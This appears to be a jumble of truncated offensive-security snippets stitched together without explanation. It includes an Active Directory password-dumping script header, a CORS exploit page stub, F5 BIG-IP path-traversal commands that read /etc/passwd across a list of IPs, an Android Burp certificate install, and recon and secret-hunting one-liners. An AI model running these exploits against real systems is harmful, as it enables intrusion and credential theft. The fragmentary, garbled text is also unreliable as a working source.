<#
This script enumerates user accounts in Active Directory and then collects
their .userPassword properties, decodes them and prints out.
Assuming we have PowerView's Get-DomainUser command available.
Usage:
PS> . .\Get-UserPasswordEntries.ps1
PS> Get-UserPasswordEntries
<!DOCTYPE html>
<html>
<head>
<title>CORS PoC Exploit</title>
</head>
<body>
<center>
<h1>CORS Exploit<br>secureITmania</h1>
<hr>
curl --silent --insecure 'https://[ip]/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=Vulnerable' | \
grep -q Vulnerable && \
printf '\033[0;31mVulnerable\n' || \
printf '\033[0;32mNot Vulnerable\n'
#!/bin/bash
##### (Cosmetic) Colour output
RED="\033[01;31m" # Issues/Errors
GREEN="\033[01;32m" # Success
YELLOW="\033[01;33m" # Warnings/Information
BLUE="\033[01;34m" # Heading
BOLD="\033[01;01m" # Highlight
RESET="\033[00m" # Normal
while read ip ; do if [[ $(curl -skL -m 1 --no-keepalive --connect-timeout 2 "https://$ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -io "root:x") == "root:x" ]]
then
echo -e "\033[0;31m""Vulnerable Big-IP in ==> $ip""\033[0m"
fi ; done < $1
#!/usr/bin/env bash
#httpx
tabhttpx0=$(httpx -h 2>&1 | grep " -" | awk -F " " '{print $1}' | sed -z 's/\n/ /g')
tabhttpx='echo -e "$tabhttpx0"'
complete -W "\$($tabhttpx)" httpx
#subfinder
tabsub0=$(subfinder -h 2>&1 | grep " -" | awk -F " " '{print $1}' | sed -z 's/\n/ /g')
tabsub='echo -e "$tabsub0"'
complete -W "\$($tabsub)" subfinder
#naabu
#!/bin/bash
curl -s http://burp/cert -x http://127.0.0.1:8080 -o cacert.der
openssl x509 -inform DER -in cacert.der -out cacert.pem
export CERT_HASH=$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1)
adb root && adb remount
adb push cacert.pem "/sdcard/${CERT_HASH}.0"
adb shell su -c "mv /sdcard/${CERT_HASH}.0 /system/etc/security/cacerts"
adb shell su -c "chmod 644 /system/etc/security/cacerts/${CERT_HASH}.0"
rm -rf cacert.*
# -*- coding: utf-8 -*-
import requests
import time
import os
import json
import sys
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
# ------Instructions---------
# Install (and configure) subfinder, assetfinder, and httprobe
# go get -v github.com/projectdiscovery/subfinder/cmd/subfinder && go get -v github.com/tomnomnom/httprobe && go get -v github.com/tomnomnom/assetfinder
# cat firefox.sh >> ~/.bashrc
# source ~/.bashrc
# Usage - subf_ff target.tld
# asset_ff target.tld
subf_ff () {
subfinder -d $1 -silent -t 100 | httprobe -c 50 | sort -u | while read line; do firefox $line; sleep 10; done
# replace $mytarget with your target
gau $mytarget|egrep -iv '\.json'|grep -iE '\.js'|antiburl|awk '{print $4}' | xargs -I %% bash -c 'python3 SecretFinder.py -i %% -o cli'
# use -r option for extract anything
gau $mytarget|egrep -iv '\.json'|grep -iE '\.js'|antiburl|awk '{print $4}' | xargs -I %% bash -c 'python3 SecretFinder.py -i %% -o cli -r "$anything"'